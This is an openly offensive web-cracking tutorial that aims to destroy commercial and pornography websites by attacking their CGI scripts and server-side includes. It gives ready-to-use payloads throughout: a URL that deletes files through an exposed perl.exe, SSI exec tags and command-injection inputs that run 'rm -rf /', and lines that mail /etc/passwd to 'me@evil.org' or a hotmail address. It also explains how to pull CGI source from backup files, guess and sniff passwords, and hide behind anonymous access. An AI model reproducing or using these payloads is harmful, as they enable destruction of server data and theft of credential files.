Our main aims
Well, we want to destroy, or lame, or at least damage commercially all
commercial oriented sites that are pestering the Web.
Therefore we want, more or less, the following:
*) know which server operating system they are using *) know which CGI-language they are using (compiled or interpreted) *) know WHERE their CGI-scripts are, how they work and what they do *) gain information about their directory structure *) gain information about their server configuration *) gain access to the source code of their CGI-scripts *) introduce our own scripts (trough various tricks) *) gain access to their server configuration files *) fuck completely and if possible irrimediably the whole siteWhich operating system are more easy to bust?
No operating system is more secure than another. The ones that
say such things are just probably trying to sell (or have just bought) a
specific operating system.
Yet UNIX is arguably more secure than a single-user platform such
as a Macintosh or a PC running Windows, because once you break into
one of these latter machines, you can access all the files :-)
UNIX, however, has a fundamental understanding of file ownerships and
permissions. Yet even if the target server is configured so that it
is owned by a safe (for example, non-root) user, which is the best
option that the sysad can choose, and even if, then, we can do only
limited damage breakíng in, this same limited damage, however, can
be bad enough, as you will see in my examples, later in this
On the other hand, because UNIX often comes preconfigured with many
different types of network services such as mail, FTP, Gopher, WWW,
and so on, there are more potential "doors" for someone to
enter. Securing all of these services is a difficult and
time-consuming process, even for the few experienced administrators around,
that's the reason they don't actually check them all too often :-)
And even if they configure everything "correctly" (from their point of view),
they are still at the mercy of the many bugs that exist in each
individual commercial package.
Security flaws in various packages are very common, as is clear from
the frequency of notices about insecurities... just have a look at the
Computer Emergency Response Team (CERT) site (which you should by all
means peruse and study :-)
Every different platform has its own different security
implications, but one is not more secure than another. In order
to begin approaching this kind of
activities, remember that there are a countless number of Web servers
available for a variety
of platforms. As a rule of thumb: the older and more frequently used the Web server,
the more
likely security bugs have been found and yet have NOT been fixed.
You may not believe it, but the 'snowball' effect inside the Web makes
and backdoors are STILL THERE!
Therefore study, read, study and read.
what people on the various Web Usenet newsgroups have to say about
each product and its authors or publishers. Read the various security
alerts from organizations
such as CERT and CIAC (Computer Incident Advisory Capability). Monitor the
best hacker sites (you'll be able to find most of them even if your search start
from my few hacker links, yet you better use -wisely- a
couple of search engines for this endeavour :-)
Study the servers' code if it is freely
available... which is the RULE for the most popular servers... that's the very
reason they are so popular! I have fetched
the whole Apache libraries recently on a discount magazine cover cd-rom...
without even
the need to download them and clutter my harddisks :-)
So, if the code is freely
available, look through the
source code yourself and see if you can find a new potential hole. Most of the time
you will... the more complex and powerful the server, the more
likely there is an undetected security hole... and most new 'hurried up' sites, like
many of the commercial smut ones, have chosen the 'last server frill' instead
of using good old NCSA :-)
CGIs, where are you?
As discussed earlier in cgi-script reversing page one; most Web servers enable you to run CGI programs in many different ways. For example, they could have designatet a specific directory as user cgi-bin. Alternatively, they could allow CGI to be stored in any user directory (i.e. in almost any directory)
There are advantages and disadvantages to both, from a security standpoint, it is better to designate one directory to store all CGI applications. Having all CGI programs in one directory makes it easier for lazy sysadmins to keep track of all of the applications on their server and to audit them for potential security holes. It also helps them to prevent our tampering: if the scripts are located in several different directories, they need to constantly check each one of these for our tampering activities :-)
If our target uses a scripting language (such as Perl) for most of
its applications, then the source code is contained within the
application itself. This code, then, is potentially vulnerable to
being read, and exploited, if the sysads of the target have not been
extremely careful!
There are very simple attempts that you can try yourself in order to get the
source code of the CGI-scripts (once you know their names, have seen
how they work and what they do and having decided which one are
potentially the most useful ones to be used as "Troian horses")
For example, many
text editors save backup files, usually appending some extension to
the end of the filename (such as .bak).
For example, many
operating system create temporary files, usually appending some extension to
the end of the filename (such as .tmp) and preceding the filename with a ~ (such as
For example, emacs saves backup files with the extension filename~. Suppose that there is a CGI script written in Perlprogram.cgistored in one of the Web data directories rather than in a central designated directory. Now suppose that the sysadm has made a trivial change to the program using emacs and forgot to remove the backup file. You now have two files in your target directory: program.cgi and program.cgi~. The Web server knows that files ending in .cgi are CGI programs and will run the program rather than display its content (yet we'll see how to get those files 'sended over' too). However, a smart cracker might try to access program.cgi~ instead. Because it does not end in .cgi, the target Web server sends it as a raw text file, thus allowing the cracker to search at leisure the CGI source code for possible holes!
However, if the target server specifies all files located in a certain directory as a CGI, it doesn't matter what the extension of the file is. So in the same example earlier, if the backup file were located in a properly designated directory (the cgi one, as opposed to some user's 'perypheric' directory) and a cracker tried to access it, the server would try to run the program EVEN WITH ITS EXTENSION "cgi~" rather than send over to us the source code.
You may ask why the sysads don't do it routinely... well: designating a
central directory as the location of all
CGI programs on a server is extremely limiting, especially on a multiuser
system. For example, all Internet Service Provider
want to allow their users to write and run their own CGI, for concurrence reasons, and are
inclined to allow CGI to be stored in any directory.
Usually sysads allow
spreaded CGI-depositories if their clients are
going to be writing a lot of special customized scripts!
suits us well: commercial smut dealers (and commercial advertisers too
for that matter) are the most prolific writers of special customized scripts
that you can find around :-)
Another issue regarding the location of CGI programs is where did they put the interpreter. For interpreted scripts, the server runs the interpreter, which in turn loads the script and executes it.
Unfortunately the interpreter is seldom located inside the target
cgi-bin directory (or in any
directory of our targets' data trees for that matter).
Giving us access to
the interpreter essentially gives us the power to run any
application or any series of commands on the target system.
I remember early days, when I could bust a lot of commercial sites
that way... now it happens seldom, yet occasionally it does and that's
real fun! The whole target goes KA-boom! under your very eyes!
This is more easy if the target uses a Windows or other non-UNIX
operating system, as it happens ofter and ofter nowadays :-)
In UNIX, they specify the interpreter in the
first line of their scripts. For example:
#!/usr/local/bin/perl # this first line says use Perl to run the script that follows ...
In Windows, for example, there is no analogous method of specifying the interpreter within the script. One way to call a Perl script would be to create a batch file that calls Perl and the script:
rem progname.bat rem a wrapper for my perl script, progname.pl c:\perl\perl.exe progname.pl ...
However, they often avoid creating this extra program by simply putting perl.exe in their cgi-bin directory and accessing the following URL:
AS soon as you see something like this perusing the web you know that a VERY big fish has bited! The above method works orright, but it also enables anyone in the world to run any Perl command on that machine.
Access imemdiately, for example, the following URL in your target machine:http://hostname/cgi-bin/perl.exe?-e+unlink+%3C*.*%3E%3B
Decoded, the previous line is equivalent to calling Perl and running the following one-line program, which will delete all the files in the current directory.
unlink <*.*>;
Clearly, this is great fun (and it is only a very 'quiet' example... download the Perl Camel book and learn a little Perl... THAT will give some pepper to your web perusing activities :-)
Some Windows servers can determine the type of script by its extension and run the appropriate interpreter. For example, Win-HTTPD assumes every CGI script ending in .pl is a Perl script and will run Perl automatically.
SSI strategic simulation? No: server-side include!
By allowing server-side include, commercial smut sites offer some
attack points.
machine, the programs are run by the owner of the server, not the
owner of the program. If the target server isn't "properly" configured and there
are sensitive files or programs owned by the server owner, as it happens
frequently, these
files and programs, and their output, become accessible for us
This is even more feasible if they allow users to edit HTML files on their
systems from Web browsers!
A common example of this is a
guestbook. In a guestbook, users fill out a form and submit
messages to a CGI program, which will often simply append the unedited
message to an HTML file, the guestbook itself.
By not editing or filtering
the submitted message, they allow the user to submit HTML code from his browser.
If they allow programs to be executed in a server-side
include, we can wreak havoc to our target machines by
submitting a tag like the following:
<!--#exec cmd="/bin/rm -rf /"-->
This server-side include is very useful for smut-sites bashing: it will attempt to delete everything it can on the target machine.
Note that the sysads try to prevent this problem in several ways without having to completely turn off server-side includes. They try to filter out all HTML tags before appending the submitted text to the guestbooks. Or they disable the exec capability of our server-side include.
Attacking should not be made in a hurry, anyway, it is often more clever to
profit of these first 'breaks' in order to gain even more information, in order to
destriy even better the target smut site!
Suppose that instead of attempting to delete everything on the smut site's
disks, we attempt to obtain the sysads /etc/passwd for
hopeful cracking purposes... using something like the following:
<!--#exec cmd="/bin/mail me@evil.org < /etc/passwd"-->
This examples demonstrate a VERY IMPORTANT TRUTH about both
server-side includes and CGI in general: Security holes can be
completely hidden. Few people know that a simple guestbook
program on a system with server-side includes poses a large security
Besides a 'normal' server has at least 100 different CGI-scripts
written by not less than 25-30 different authors!
Social engineering can
also help a lot... most authors brag about their (pathetical) CGI-scripts, with
source code and everything, on their own homepages!
So, we have seen some very complicated ways to access the cgi-source, yet
with HTTP it is trivial to bypass a form (or even the browser) and remotely
access the SCRIPT directly from the COMMAND LINE of your workstation.
telnet www80 connect www.slac.stanford.edu ;special site for demonstration purposes escape character is '^]' GET /cgi-bin/pingre?foo;mail+hcu4412@hotmail.comYou dig it? It would be a good idea to try routinely not only telnet, but also all other 'forotten' services: ftp, tftp, nntp, bootp...
A common way to control access to files is based on the IP access control (say
restrictin access to nodes with IP address= 210.56.*.* yet this cannot work for the smut
sites, which are struggling to get lusers from wherever they come. A good idea is,
anyway, to bang around the web using a dynamic IP provider (a multi user host
like AOL or Compuserve, or
whatever), that will not cost you anything at all (see
for information about free anonymous web surfing)
and is very seldom IP-restricted, for obvious reasons.
Most smut sites (most sites for that matter :-) have a list of 'authorized'
users each with an assigned user name and password, as we have seen, some servers
also support groups of users. When a protected file or image or directory is
accessed, the browser pops up a dialog box asking for the user name and password, and
gives access if valid, else throws up an 'authorization failed' URL.
- There is a significant administration overhead for maintaining such lists, and therefore these lists are NOT updated all too often... - Stupid user park must remember these passwords and tend to use the same schemes (see a general approach) that are easy to guess. Automated password generation (that users dislike) is also fairly easy to crack :-) - Most web servers allow an infinite number of guesses! - Passwords are NOT encrypted (not even on military servers :-) and therefore are vulnerable to our sniffers
This last point deserves some more information. Encryption on the web is a huge area,
and if you want to learn it really you'll be gone for the next three years (yet some
very good (and old) crackers have taken that path, let's hope they will bring
something back before they die :-).
There are two current standards for REAL encryption:
- Secure Socket Layer (SSL) from Netscape
- S-HTTP from the CommerceNet coalition
They both use pair of keys, a public one and a private one.
They work like PGP: you
encrypt a message with your private key and only people that know your public key can
decrypt the message AND know that it is yours, i.e. it is also like a signature.
People encrypt messages with your public key and only you can decrypt them, since you
are the only one that knows his own private key.
SSL Connection ping-pong:
- browser connects to server via HTTPS
- server sends back digital signature
- browser verifies digital signature (signed by a trustworthy CA)
- if OK browser generates a master key based on a random number,
encrypts with server's public key and sends to server
- server decrypts master key trough its private key
- browser and server generate session key based on master key and random
numbers and now have both an identical session key
- data between browser and server is encrypted using said session key
Sounds impressive when you read it like that, doesn't it? And yet +ORC has already
cracked it :-)
Let's go back to some other CGI-script tricks... which are IMO great fun: time
to learn and use the Perl ticks!
Observe the finger gateway written in Perl inside Kim's Listing below.
All this program is doing is allowing the user to specify a user and a host,
and the CGI will finger the user at the host and display the
Listing: finger.cgi.
#!/usr/local/bin/perl # finger.cgi - an unsafe finger gateway require 'cgi-lib.pl'; print &PrintHeader; if (&ReadParse(*in)) { print "<pre>\n"; print `/usr/bin/finger $in{'username'}`; print "</pre>\n"; } else { print "<html> <head>\n"; print "<title>Finger Gateway</title>\n"; print "</head>\n<body>\n"; print "<h1>Finger Gateway</h1>\n"; print "<form method=POST>\n"; print "<p>User@Host: <input type=text name=\"username\">\n"; print "<p><input type=submit>\n"; print "</form>\n"; print "</body> </html>\n"; }
At first glance, this might seem like a harmless finger gateway. There's no danger of a buffer overflow because it is written in Perl. It uses the complete pathname of the finger binary so the gateway can't be tricked into using a fake finger program. If the input is in an improper format, the gateway will return an error, but not one that can be manipulated by us.
However, what if we try entering the following field:
nobody@nowhere.org ; /bin/rm -rf /
Work out how the following line of the perl script above will deal with our input:
print `/usr/bin/finger $in{'username'}`;
Because we are using back ticks (`), first it will spawn a shell.
Then it will execute the following command:
/usr/bin/finger nobody@nowhere.org ; /bin/rm -rf /
What will this do? Imagine typing this in at the command line. It
will wipe out all of the files and directories it can, starting from
the root directory. OK: we assume that the rm command
was in the /bin directory.We could also have assumed that rm
was in the path. On
a chrooted environment that does not have the rm binary located
anywhere in the directory tree this would not have worked... however, both of
the guesses above are pretty reasonable guesses
for the majority of UNIX machines, yet they are not global truths:
In reality, most Web environments are not chrooted,
simply because it prevents the flexibility many people need in a Web
This will also almost always work unless they have rendered
the semicolon (;) metacharacter harmless.
Even if we could not remove all the files in a target smut site because the server was not running as root, we could just as easily have tryed to input the following command, which would have e-mailed the /etc/passwd file to me@evil.org for our cracking pleasure :-)
nobody@nowhere.org ; /bin/mail me@evil.org < /etc/passwd
This follows the same principle as above... by now you should be able
to understand how and why :-)
Let's see another example: say you find (or suppose :-) a (poor) shell
script called "pinger" or whatever, inside the cgi-bin of your target
smut site, looking more or less like
#!bin/sh host='ping -c 5 $1'Now imagine futtering that with an argument like:
foo; mail hcu2234@hotmail.com < /etc/passwdAnd you can spend the weekend cracking the password file :-)
As you can see, if such holes slip past the sysads inside a simple CGI program, you can be sure that they will never have properly and securely configured their complicated UNIX system and Web server :-)
Notice that the file you are 'asking' for does not have to be /etc/passwd... it
could be any file accessible to the server (including afs and nfs), like (for
instance) the drafts of the examination tests you would have to solve tomorrow at
your local university (and university servers are, if possible, even less
secured than the smut sites' ones :-)
Knowledge -not money any more- means now power
my dears... we have entered a new age... get used to this.
Notice that there are several more functions in Perl that spawn the
shell than there are in C. It is not immediately obvious, even to the
intermediate Perl programmers, that back ticks spawn a shell before
executing the program. This is the alternative value of higher-level
languages for cracking purposes, as we know from our software reversing studies:
our enemies mostly don't know what security
holes a function might cause
because they don't necessarily know exactly what it does, don't forget that they
DON'T UNDERSTAND SOURCE CODE and have only access to some (biased) high level
languages books... but we do understand assembly, oh yes, we do! And we can beat them
black and blue every time we like...
That is, we may, if we
study and experiment a lot... and if we will build on each other using the real strenght
of Internet: free non commercial team working! People coming from places that you
don't even know exist will help you to understand better than anybody else all
these complex matters in few weeks on
a "do ut des" basis!
For an incredible example of the incredible MIGHT (in matters of software cracking) that the
Web allows, if non-commercial minds gather together and work for free on some projects,
see our students' essays pages
Yes: reading all this stuff here won't help you much, nor help me at all, unless you work on
this on your own AND CONTRIBUTE!